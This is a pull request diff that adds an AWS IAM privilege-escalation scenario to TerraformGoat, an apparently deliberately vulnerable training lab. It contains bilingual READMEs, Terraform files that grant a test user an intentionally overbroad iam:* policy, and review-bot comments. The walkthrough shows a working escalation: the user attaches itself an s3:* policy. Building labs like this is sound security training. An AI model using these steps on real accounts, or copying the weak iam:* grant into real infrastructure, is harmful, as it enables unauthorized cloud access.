Merge pull request #30 from teamssix/main
feat: add aws iam privilege escalation scenario
Showing 11 changed files with 308 additions and 18 deletions.
aws/identity_and_access_management/privilege_escalation/README.md (116 additions, 0 deletions)
@@ -0,0 +1,116 @@ | ||
# AWS IAM Privilege Escalation Vulnerable Environment | ||
|
||
English | [中文](./README_CN.md) | ||
|
||
## Description | ||
|
||
This is a scenario used to build the AWS IAM privilege escalation vulnerability environment. | ||
|
||
After building the environment with Terraform, The IAM privilege elevation vulnerability can be used to access services that you would not otherwise have permission to access. | ||
|
||
## Deployment Environment | ||
|
||
Execute the following command in the container | ||
|
||
```shell | ||
cd /TerraformGoat/aws/identity_and_access_management/privilege_escalation | ||
``` | ||
|
||
Configure AWS Access Credentials | ||
|
||
```shell | ||
aws configure | ||
``` | ||
|
||
> You can see the access key in the AWS [Console --> Security Credentials] | ||
Deploy Vulnerable Environment | ||
|
||
```shell | ||
terraform init | ||
terraform apply | ||
``` | ||
|
||
> When the terminal prompts `Enter a value:`, enter `yes` | ||
After building the scenario, use the following command to view the access_key_id and secret_access_key of the low privilege account. | ||
|
||
```shell | ||
apt-get install jq -y | ||
terraform state pull | jq '.resources[] | select(.type == "aws_iam_access_key") | .instances[0].attributes' | ||
``` | ||
|
||
![img](../../../images/1652690733.png) | ||
|
||
## Vulnerability Utilization | ||
|
||
First configure the access_key_id and secret_access_key of the low privilege account. | ||
|
||
```shell | ||
aws configure | ||
``` | ||
|
||
After the configuration, here is an example of S3 service, try to run the following command, you can see the return message shows that access is denied. | ||
|
||
```shell | ||
aws s3 ls | ||
``` | ||
|
||
![img](../../../images/1652690932.png) | ||
|
||
Get the privileges held by the current user. | ||
|
||
```shell | ||
aws iam get-user | ||
aws iam list-user-policies --user-name huoxian_terraform_test | ||
aws iam get-user-policy --user-name huoxian_terraform_test --policy-name IAMFullAccess | ||
``` | ||
|
||
![img](../../../images/1652692179.png) | ||
|
||
You can see that the current user has all the privileges of IAM, which means that we can give S3 privileges to the current user, thus enabling the current user to access S3 service resources. | ||
|
||
Edit policy file | ||
|
||
```shell | ||
vim AmazonS3FullAccess.json | ||
``` | ||
|
||
The contents of the policy file are as follows: | ||
|
||
```json | ||
{ | ||
"Version": "2012-10-17", | ||
"Statement": [ | ||
{ | ||
"Effect": "Allow", | ||
"Action": [ | ||
"s3:*", | ||
"s3-object-lambda:*" | ||
], | ||
"Resource": "*" | ||
} | ||
] | ||
} | ||
``` | ||
|
||
PUT policy file | ||
|
||
```shell | ||
aws iam put-user-policy --user-name huoxian_terraform_test --policy-name AmazonS3FullAccess --policy-document file://AmazonS3FullAccess.json | ||
``` | ||
|
||
Try again to get the S3 service resource, you can see that it has been obtained, which means that the policy file is in effect, so that the IAM privilege elevation is achieved. | ||
|
||
```shell | ||
aws s3 ls | ||
``` | ||
|
||
![img](../../../images/1652692416.png) | ||
|
||
## Destroy the environment | ||
|
||
```shell | ||
aws iam delete-user-policy --user-name huoxian_terraform_test --policy-name AmazonS3FullAccess | ||
terraform destroy | ||
``` |
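Review bot: the second `aws configure` under "Vulnerability Utilization" overwrites the default profile that `terraform apply` used, so the closing `terraform destroy` runs with the low-privilege test user's key rather than the deployer's credentials; document a named profile (for example `aws configure --profile lowpriv` and `aws --profile lowpriv s3 ls`) or tell the reader to restore the deployer credentials before "Destroy the environment". Two smaller points in the same file: the capital "The" in "After building the environment with Terraform, The IAM privilege elevation vulnerability" should be lowercase, and `apt-get install jq -y` is a prerequisite rather than part of the state-inspection command, so it reads better as a separate note. Running `aws iam delete-user-policy` before `terraform destroy` is the right order and worth a sentence of explanation: the `AmazonS3FullAccess` inline policy was attached outside Terraform, and IAM refuses to delete a user that still carries inline policies.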
aws/identity_and_access_management/privilege_escalation/README_CN.md (116 additions, 0 deletions)
@@ -0,0 +1,116 @@ | ||
# AWS IAM 提权漏洞环境 | ||
|
||
[English](./README.md) | 中文 | ||
|
||
## 描述信息 | ||
|
||
这是一个用于构建 AWS IAM 提权漏洞环境的靶场。 | ||
|
||
使用 Terraform 构建环境后,用户可以通过 IAM 提权漏洞访问到原本没有权限访问的服务。 | ||
|
||
## 环境搭建 | ||
|
||
在容器中执行以下命令 | ||
|
||
```shell | ||
cd /TerraformGoat/aws/identity_and_access_management/privilege_escalation | ||
``` | ||
|
||
配置 AWS 访问凭证 | ||
|
||
```shell | ||
aws configure | ||
``` | ||
|
||
> 在 AWS 「控制台——》安全凭证」处可以设置并查看你的 `aws_access_key_id` 和 `aws_secret_access_key` | ||
部署靶场 | ||
|
||
```shell | ||
terraform init | ||
terraform apply | ||
``` | ||
|
||
> 在终端提示 `Enter a value:` 时,输入 `yes` 即可 | ||
环境搭建完后,通过以下命令查看低权限账号的 access_key_id 和 secret_access_key | ||
|
||
```shell | ||
apt-get install jq -y | ||
terraform state pull | jq '.resources[] | select(.type == "aws_iam_access_key") | .instances[0].attributes' | ||
``` | ||
|
||
![img](../../../images/1652690733.png) | ||
|
||
## 漏洞利用 | ||
|
||
首先配置上低权限账号的 access_key_id 和 secret_access_key | ||
|
||
```shell | ||
aws configure | ||
``` | ||
|
||
配置完后,这里以 S3 服务为例,尝试运行以下命令,发现访问被拒绝 | ||
|
||
```shell | ||
aws s3 ls | ||
``` | ||
|
||
![img](../../../images/1652690932.png) | ||
|
||
查看当前用户的权限 | ||
|
||
```shell | ||
aws iam get-user | ||
aws iam list-user-policies --user-name huoxian_terraform_test | ||
aws iam get-user-policy --user-name huoxian_terraform_test --policy-name IAMFullAccess | ||
``` | ||
|
||
![img](../../../images/1652692179.png) | ||
|
||
发现当前用户有 IAM 的所有权限,这也就意味着我们可以给当前用户赋予 S3 的权限,从而使当前用户拥有 S3 服务的权限。 | ||
|
||
编辑策略文件 | ||
|
||
```shell | ||
vim AmazonS3FullAccess.json | ||
``` | ||
|
||
文件内容如下: | ||
|
||
```json | ||
{ | ||
"Version": "2012-10-17", | ||
"Statement": [ | ||
{ | ||
"Effect": "Allow", | ||
"Action": [ | ||
"s3:*", | ||
"s3-object-lambda:*" | ||
], | ||
"Resource": "*" | ||
} | ||
] | ||
} | ||
``` | ||
|
||
上传策略文件 | ||
|
||
```shell | ||
aws iam put-user-policy --user-name huoxian_terraform_test --policy-name AmazonS3FullAccess --policy-document file://AmazonS3FullAccess.json | ||
``` | ||
|
||
再次尝试获取 S3 服务内容,发现已经可以获取了,说明策略文件生效了,这样就实现了 IAM 提权。 | ||
|
||
```shell | ||
aws s3 ls | ||
``` | ||
|
||
![img](../../../images/1652692416.png) | ||
|
||
## 销毁环境 | ||
|
||
```shell | ||
aws iam delete-user-policy --user-name huoxian_terraform_test --policy-name AmazonS3FullAccess | ||
terraform destroy | ||
``` |
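Review bot: the same profile problem as in README.md applies here: the second `aws configure` under "漏洞利用" replaces the deployer credentials, so the `terraform destroy` in "销毁环境" runs as the low-privilege user; suggest the same named-profile wording in both languages. The blockquote after the first `aws configure` also differs between the two files: this version says the console lets you set and view `aws_access_key_id` and `aws_secret_access_key`, while README.md only says the access key can be seen there; align the two so the translations stay in sync.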
aws/identity_and_access_management/privilege_escalation/main.tf (46 additions, 0 deletions)
@@ -0,0 +1,46 @@ | ||
provider "aws" { | ||
region = "us-east-1" | ||
} | ||
|
||
resource "aws_iam_user" "huoxian_terraform_user" { | ||
name = "huoxian_terraform_test" | ||
} | ||
|
||
resource "aws_iam_access_key" "huoxian_terraform_access_key" { | ||
user = aws_iam_user.huoxian_terraform_user.name | ||
depends_on = [aws_iam_user.huoxian_terraform_user] | ||
} | ||
|
||
resource "aws_iam_user_policy" "huoxian_terraform_policy" { | ||
name = "IAMFullAccess" | ||
user = aws_iam_user.huoxian_terraform_user.name | ||
depends_on = [aws_iam_user.huoxian_terraform_user] | ||
policy = <<EOF | ||
{ | ||
"Version": "2012-10-17", | ||
"Statement": [ | ||
{ | ||
"Action": [ | ||
"iam:*", | ||
"organizations:DescribeAccount", | ||
"organizations:DescribeOrganization", | ||
"organizations:DescribeOrganizationalUnit", | ||
"organizations:DescribePolicy", | ||
"organizations:ListChildren", | ||
"organizations:ListParents", | ||
"organizations:ListPoliciesForTarget", | ||
"organizations:ListRoots", | ||
"organizations:ListPolicies", | ||
"organizations:ListTargetsForPolicy" | ||
], | ||
"Effect": "Allow", | ||
"Resource": "*" | ||
} | ||
] | ||
} | ||
EOF | ||
} | ||
|
||
data "template_file" "secret" { | ||
template = aws_iam_access_key.huoxian_terraform_access_key.encrypted_secret | ||
} |
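Review bot: the `data "template_file" "secret"` block at the end is dead code: nothing references it, and `encrypted_secret` on `aws_iam_access_key` is only populated when `pgp_key` is set on the resource, which it is not here, so the template would always be empty; it also pulls in the deprecated `hashicorp/template` provider that versions.tf does not declare. Drop the block, since the README reads the key out of `terraform state pull` anyway. The two `depends_on = [aws_iam_user.huoxian_terraform_user]` lines are redundant because `user = aws_iam_user.huoxian_terraform_user.name` already creates the dependency. A comment above the `IAMFullAccess` policy stating that `iam:*` on `"Resource": "*"` is the intentional weakness of this scenario would help readers who copy the file into their own modules.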
aws/identity_and_access_management/privilege_escalation/versions.tf (8 additions, 0 deletions)
@@ -0,0 +1,8 @@ | ||
terraform { | ||
required_providers { | ||
aws = { | ||
source = "hashicorp/aws" | ||
version = "4.10.0" | ||
} | ||
} | ||
} |
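Review bot: `required_providers` declares only `hashicorp/aws`, but main.tf also uses `data "template_file"`, so either add `hashicorp/template` here or remove that data source. Consider adding a `required_version` constraint for Terraform itself, and note in a comment why `hashicorp/aws` is pinned to exactly `4.10.0` rather than `~> 4.10` if the exact pin is deliberate for reproducibility in the TerraformGoat container.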